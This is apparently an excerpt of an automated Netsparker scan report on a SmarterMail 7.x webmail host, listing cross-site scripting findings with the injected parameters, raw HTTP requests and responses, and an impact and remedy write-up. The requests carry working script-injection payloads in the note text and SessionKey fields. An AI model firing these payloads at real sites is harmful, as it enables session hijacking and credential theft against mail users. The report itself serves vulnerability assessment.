if (uploader.total.uploaded + uploader.total.failed == uploader.files.length) {
uploader.stop();
updateGrid();

if (uploader.total.failed == 0)
ShowAttachentsArea(false, true);
else if(!top.confirmRadWindow)
ShowAlertWindow(GenericUploadError);
}

return retVal;
}

function generateUploadListItem(id, name, percent, size, extraHtml, status) {
var sizeString;

if (activeUploadRuntime == 'html4') {
sizeString = "Unknown";
}
else if (size > 10485760)
sizeString = Math.round(size / 1048576, 1) + " " + Text_MB;
else if (size > 1024)
sizeString = Math.round(size / 1024, 1) + " " + Text_KB;
else
sizeString = size + " " + Text_B;

var actionClass = "";

switch (status) {
case plupload.DONE: actionClass = 'plupload_done'; break;
case plupload.FAILED: actionClass = 'plupload_failed'; break;
case plupload.QUEUED: actionClass = 'plupload_queued'; break;
case plupload.UPLOADING: actionClass = 'plupload_uploading'; break;
default: actionClass = 'plupload_failed'; break;
}

if (percent > 0 && actionClass != 'plupload_failed' && actionClass != 'plupload_done')
..
- /Main/frmNotes.aspx

/Main/frmNotes.aspx CONFIRMED

http://vulnerable.smartermail.7.x.host:9998/Main/frmNotes.aspx

Parameters

Parameter Type Value
ctl00%24MPH%24txtNote_SettingText POST '"--><script>alert(0x009584)</script>

Request

GET /Main/frmNotes.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:17:59 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10711
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNotes.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&amp;t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1','tctl00$NavPH$UpdatePanel2','tctl00$CntPH$UpdatePanel3'], ['ctl00$BPH$DeleteIcon','ctl00$SPH$btnGo','ctl00$SPH$btnClear'], [], 90);
//]]>
</script>


<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>

<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">

<div id="ctl00_BPH_btnAddNote" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmNote.aspx?ret=1&popup=true', 600, 500);; return false;"><span class="BBInner">New</span></a></div>
<div id="ctl00_BPH_EditIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_EditIcon(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteIcon(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_btnShowHideSearchBar" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ToggleSearch();; return false;"><span class="BBInner">Search</span></a></div>

</div>
<div class="ButtonBarRight">


</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>
<div id="ctl00_SearchRow" class="SearchRow" style="display:none;">

<table class="SearchContents">
<tr>
<td class="SCText">
Search
<input name="ctl00$SPH$txtSearchString" type="text" id="ctl00_SPH_txtSearchString" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});" />
<select name="ctl00$SPH$lstColors" id="ctl00_SPH_lstColors" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option value="">All Colors</option>
<option value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>

</select>
<select name="ctl00$SPH$lstCategories" id="ctl00_SPH_lstCategories" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option selected="selected" value="">All Categories</option>
<option value=" ">No Category</option>
<option value="1">1</option>

</select>
</td>
<td class="SCButtons">
<div id="ctl00_SPH_btnGo" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$SPH$btnGo',''); return false;"><span class="BBInner">Find Now</span></a></div>

<script type="text/javascript">
window.setInterval("if (invalid) { invalid = false; Refresh(); }", 333);
function Refresh() { __doPostBack('ctl00$SPH$btnGo',''); }
function ClearText()
{
var el = document.getElementById('ctl00_SPH_txtSearchString');
if (el) el.value = "";
el = document.getElementById('ctl00_SPH_lstCategories');
if (el) el.selectedIndex = 0;
el = document.getElementById('ctl00_SPH_lstColors');
if (el) el.selectedIndex = 0;
}
function DoubleClick(newUrl, uid, isNew)
{
OpenUniqueNewMessage(newUrl, 600, 500, uid);
}
</script>

<div id="ctl00_SPH_btnClear" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false;"><span class="BBInner">Clear</span></a></div><script type='text/javascript'>ToggleSearchClear = function() { ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false; }</script>
</td>
</tr>
</table>

</div>


<span id="ctl00_UpdatePanel1">

</span>

<div id="Scrollable" class="ContentDiv">

<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_MPH_UP1">


<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="SmallImage" style="overflow: hidden">&nbsp;</th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=text')">Note</a></th><th scope="col" class="rc leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=realdate')">Date<img src='/App_Themes/Default/Images/Misc/down.gif' /></a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZmE3NGZjMWRhMjI5NDJlMTliMmI4YzI0Nzc1ZGY5ZDU-" name="ctl00_MPH_HyperGrid1_CB64_ZmE3NGZjMWRhMjI5NDJlMTliMmI4YzI0Nzc1ZGY5ZDU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MzA1ZTg5YzI5MWYzNDYxMThiMzA2NDI3N2EwYTdiM2I-" name="ctl00_MPH_HyperGrid1_CB64_MzA1ZTg5YzI5MWYzNDYxMThiMzA2NDI3N2EwYTdiM2I-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">'"--><script>netsparker(0x009584)</script></td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YzcyY2MwNmYzZDAyNDU5MmFkNTBkMDY5ZDZmOTFiNDM-" name="ctl00_MPH_HyperGrid1_CB64_YzcyY2MwNmYzZDAyNDU5MmFkNTBkMDY5ZDZmOTFiNDM-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZWMyNmNiMzM1YzY3NDJmMDliMjMyYzVlYjgxYTQ2ODU-" name="ctl00_MPH_HyperGrid1_CB64_ZWMyNmNiMzM1YzY3NDJmMDliMjMyYzVlYjgxYTQ2ODU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZGVjNjA3YTkzZjc5NDc2NGIwNmZkMDYyZWJjYThhMGY-" name="ctl00_MPH_HyperGrid1_CB64_ZGVjNjA3YTkzZjc5NDc2NGIwNmZkMDYyZWJjYThhMGY-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MmU4NTI1NGZkNzVlNDgxNDlmNjViNjZjZTM0NDY4YzE-" name="ctl00_MPH_HyperGrid1_CB64_MmU4NTI1NGZkNzVlNDgxNDlmNjViNjZjZTM0NDY4YzE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MjBkM2VmODY1MjJlNDkxNThhODY3MjNmMGYzNzlhYTM-" name="ctl00_MPH_HyperGrid1_CB64_MjBkM2VmODY1MjJlNDkxNThhODY3MjNmMGYzNzlhYTM-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NzAwMmQxNDM2MWY4NDBhZjg0YWY2MWRjNmM3MzBmN2Y-" name="ctl00_MPH_HyperGrid1_CB64_NzAwMmQxNDM2MWY4NDBhZjg0YWY2MWRjNmM3MzBmN2Y-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></..
[Possible] Cross-site Scripting

[Possible] Cross-site Scripting

1 TOTAL
MEDIUM
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

Netsparker believes that there is an XSS (Cross-site Scripting) issue here, but it could not confirm it. We strongly recommend investigating the issue manually to ensure that it is an XSS (Cross-site Scripting) and needs to be addressed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' sessions, an attacker might target an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hijacking users' active sessions.
  • Changing the look of the page within the victim's browser.
  • Mounting a successful phishing attack.
  • Intercepting data and performing man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered / encoded. Output should be filtered / encoded according to the output format and location.

There are a number of pre-defined, well-structured white-list libraries available for many different environments; OWASP Reform and the Microsoft Anti-Cross-site Scripting library are good examples.

Remedy References

External References

- /default.aspx

/default.aspx

http://vulnerable.smartermail.7.x.host:9998/default.aspx

Parameters

Parameter Type Value
ctl00%24ScriptManager1 POST ctl00$ScriptManager1|ctl00$Split$LP$lnkUpdate
__EVENTTARGET POST ctl00$Split$LP$lnkUpdate
__EVENTARGUMENT POST UserContacts|/Main/frmEmptyPreviewOuter.aspx?type=contacts
__VIEWSTATE POST /wEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZGQAofCuGKRyjE010WA/AQKKvJgVAw==
ctl00%24Split%24LP%24SessionKey POST '"--><script>alert(0x00152B)</script>
ctl00%24PageTitle POST 3
ctl00%24PanelLoadedState POST {}
__ASYNCPOST POST true

Notes

Due to the content-type of the response, exploitation of this vulnerability might not be possible in all browsers, or might not be possible at all. The content-type indicates that exploitation may be possible by changing the attack; however, Netsparker does not support confirming these issues, so you need to confirm this problem manually. Generally, a lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers that perform automatic MIME sniffing, such as Internet Explorer.

Request

POST /default.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Content-Length: 495
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7cctl00%24Split%24LP%24lnkUpdate&__EVENTTARGET=ctl00%24Split%24LP%24lnkUpdate&__EVENTARGUMENT=UserContacts%7c%2fMain%2ffrmEmptyPreviewOuter.aspx%3ftype%3dcontacts&__VIEWSTATE=%2fwEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZGQAofCuGKRyjE010WA%2fAQKKvJgVAw%3d%3d&ctl00%24Split%24LP%24SessionKey='%22--%3e%3cscript%3enetsparker(0x00152B)%3c%2fscript%3e&ctl00%24PageTitle=3&ctl00%24PanelLoadedState=%7b%7d&__ASYNCPOST=true

Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 01:12:30 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 5962
Connection: Close


14723|updatePanel|ctl00_Split_LP_StyledUpdatePanel1|

<div style="display: none">
<div id="ctl00_Split_LP_ctl01_btnDelete" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_Split_LP_ctl01_btnDelete(); return false;"><span class="BBInner">Delete</span></a></div>
</div>
<div class="PageTitle" id="SectionHeader">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">

<!-- HyperMenu -->
<div class='hmNavMenu'><ul class='hmMenu hmNavMenu hmList' id='ctl00_Split_LP_ctl01_menuContactsSourceTitle' name='ctl00$Split$LP$ctl01$menuContactsSourceTitle' style='z-index:1002'>
<li class='hmItem hmFirst hmLast' id='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource' style='z-index: 1002'><a class='hmA hmHasChildren' href='#'>My Contacts<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst hmCheckable hmChecked' id='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource_menuSourceSelf' style='z-index: 1002'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource_menuSourceSelf_CB' group='source' type='checkbox'checked='checked'></div>My Contacts</a></li>
<li class='hmItem hmCheckable' id='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource_menuaSourceGlobalAddressList' style='z-index: 1002'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource_menuaSourceGlobalAddressList_CB' group='source' type='checkbox'></div>Global Address List</a></li>
<li class='hmSeperator' style='z-index:1002'><span><!-- --></span></li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource_menuSourceManage' style='z-index: 1002'><a class='hmA' href='#'>Mapped Resources</a></li>
</ul><div class='hmScrollDown'></div></div>
</li>
</ul>
</div>

</div>
</div>
</div>
<div id="ButtonBar" class="ButtonBar">

<!-- HyperMenu -->
<div class='hmMenuBar'><ul class='hmMenu hmMenuBar hmList' id='ctl00_Split_LP_ctl01_menuContacts' name='ctl00$Split$LP$ctl01$menuContacts' style='z-index:1001'>
<li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>New<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_b7d9b2bd5f28443c84a0178adbb0a050' style='z-index: 1001'><a class='hmA' href='#'>New Message</a></li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_1413e4ca1c0040fc9dd9651dd66aaf9b' style='z-index: 1001'><a class='hmA' href='#'>New Contact</a></li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_148b4e3c58354e7e908efb233bd9300f' style='z-index: 1001'><a class='hmA' href='#'>New Appointment</a></li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_7239e2ab6f054d5e84c1686297ff21c4' style='z-index: 1001'><a class='hmA' href='#'>New Task</a></li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_5ad20d5a60cf4a20a34edf0b2e089837' style='z-index: 1001'><a class='hmA' href='#'>New Note</a></li>
</ul><div class='hmScrollDown'></div></div>
</li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>Actions<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuSelectAll' style='z-index: 1001'><a class='hmA' href='#'>Select All</a></li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuDelete' style='z-index: 1001'><a class='hmA' href='#'>Delete</a></li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuEmailSelected' style='z-index: 1001'><a class='hmA' href='#'>Send Email</a></li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuAddToOutlook' style='z-index: 1001'><a class='hmA' href='#'>Add to Outlook</a></li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuImportExport' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>Import/Export<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuImportExport_menuImport' style='z-index: 1001'><a class='hmA' href='#'>Import</a></li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuImportExport_menuExport' style='z-index: 1001'><a class='hmA' href='#'>Export</a></li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuImportExport_menuExportAll' style='z-index: 1001'><a class='hmA' href='#'>Export All</a></li>
</ul><div class='hmScrollDown'></div></div>
</li>
</ul><div class='hmScrollDown'></div></div>
</li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>View<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>Filter<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>Category<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst hmCheckable hmChecked' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory_menuCategoryAllCategories' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory_menuCategoryAllCategories_CB' group='category' type='checkbox'checked='checked'></div>All Categories</a></li>
<li class='hmItem hmCheckable' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory_menuaCategoryNOCATEGORY' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory_menuaCategoryNOCATEGORY_CB' group='category' type='checkbox'></div>No Category</a></li>
<li class='hmItem hmLast hmCheckable' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory_menuCate1' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory_menuCate1_CB' group='category' type='checkbox'></div>1</a></li>
</ul><div class='hmScrollDown'></div></div>
</li>
<li class='hmSeperator' style='z-index:1001'><span><!-- --></span></li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterClear' style='z-index: 1001'><a class='hmA' href='#'>Reset Filter</a></li>
</ul><div class='hmScrollDown'></div></div>
</li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>Sort<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst hmCheckable hmChecked' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortAsc' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortAsc_CB' group='Sort' type='checkbox'checked='checked'></div>Ascending</a></li>
<li class='hmItem hmCheckable' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortDesc' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortDesc_CB' group='Sort' type='checkbox'></div>Descending</a></li>
<li class='hmSeperator' style='z-index:1001'><span><!-- --></span></li>
<li class='hmItem hmCheckable hmChecked' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortDisplayName' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortDisplayName_CB' group='SortType' type='checkbox'checked='checked'></div>Display Name</a></li>
<li class='hmItem hmCheckable' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortEmailAddress' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortEmailAddress_CB' group='SortType' type='checkbox'></div>Email</a></li>
<li class='hmItem hmLast hmCheckable' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortCompany' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortCompany_CB' group='SortType' type='checkbox'></div>Company</a></li>
</ul><div class='hmScrollDown'></div></div>
</li>
